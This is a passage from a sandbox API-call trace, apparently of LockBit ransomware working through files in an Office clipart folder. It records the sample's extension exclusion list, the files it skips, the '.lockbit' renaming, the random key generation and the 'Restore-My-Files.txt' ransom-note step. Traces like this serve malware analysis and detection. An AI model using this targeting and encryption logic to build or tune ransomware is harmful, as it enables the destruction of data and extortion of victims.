lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1a6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAPER_01.MID", cAlternateFileName="")) returned 1 [0165.378] lstrcmpiW (lpString1=".", lpString2="PAPER_01.MID") returned -1 [0165.378] lstrcmpiW (lpString1="..", lpString2="PAPER_01.MID") returned -1 [0165.378] PathFindExtensionW (pszPath="PAPER_01.MID") returned=".MID" [0165.378] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.378] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.378] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.378] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.378] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.378] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.379] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.379] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.380] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.380] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PAPER_01.MID") returned 1 [0165.380] lstrcmpiW (lpString1="ntldr", lpString2="PAPER_01.MID") returned -1 [0165.380] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PAPER_01.MID") returned -1 [0165.380] lstrcmpiW (lpString1="bootsect.bak", lpString2="PAPER_01.MID") returned -1 [0165.380] lstrcmpiW (lpString1="autorun.inf", lpString2="PAPER_01.MID") returned -1 [0165.380] lstrcmpiW (lpString1="thumbs.db", lpString2="PAPER_01.MID") returned 1 [0165.380] lstrcmpiW (lpString1="iconcache.db", lpString2="PAPER_01.MID") returned -1 [0165.380] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.380] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned=".MID" [0165.380] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.380] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.380] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.380] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.381] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.381] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.381] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.lockbit") returned 72 [0165.381] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.383] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.383] malloc (_Size=0x40068) returned 0x3df0008 [0165.383] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6763) returned 1 [0165.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.384] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.411] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.412] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.412] free (_Block=0x1fa2ed8) [0165.412] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.412] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.413] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.413] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x195b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_01.MID", cAlternateFileName="")) returned 1 [0165.413] lstrcmpiW (lpString1=".", lpString2="PARNT_01.MID") returned -1 [0165.413] lstrcmpiW (lpString1="..", lpString2="PARNT_01.MID") returned -1 [0165.413] PathFindExtensionW (pszPath="PARNT_01.MID") returned=".MID" [0165.413] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.413] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.413] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.413] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.413] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.413] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.414] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.414] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.415] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.415] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.415] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_01.MID") returned 1 [0165.415] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_01.MID") returned -1 [0165.415] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_01.MID") returned -1 [0165.415] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_01.MID") returned -1 [0165.415] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_01.MID") returned -1 [0165.415] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_01.MID") returned 1 [0165.415] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_01.MID") returned -1 [0165.415] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.415] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID") returned=".MID" [0165.415] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.415] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.415] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.415] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.416] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.416] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.416] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.lockbit") returned 72 [0165.416] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.418] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.418] malloc (_Size=0x40068) returned 0x3df0008 [0165.418] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6491) returned 1 [0165.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.420] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.425] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.425] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.426] free (_Block=0x1fa2ed8) [0165.426] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.426] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.426] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.426] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1652, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_02.MID", cAlternateFileName="")) returned 1 [0165.426] lstrcmpiW (lpString1=".", lpString2="PARNT_02.MID") returned -1 [0165.426] lstrcmpiW (lpString1="..", lpString2="PARNT_02.MID") returned -1 [0165.426] PathFindExtensionW (pszPath="PARNT_02.MID") returned=".MID" [0165.426] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.426] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.426] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.426] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.426] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.426] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.427] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.427] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.428] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.428] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_02.MID") returned 1 [0165.428] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_02.MID") returned -1 [0165.428] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_02.MID") returned -1 [0165.428] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_02.MID") returned -1 [0165.428] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_02.MID") returned -1 [0165.428] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_02.MID") returned 1 [0165.428] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_02.MID") returned -1 [0165.428] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.428] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID") returned=".MID" [0165.429] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.429] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.429] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 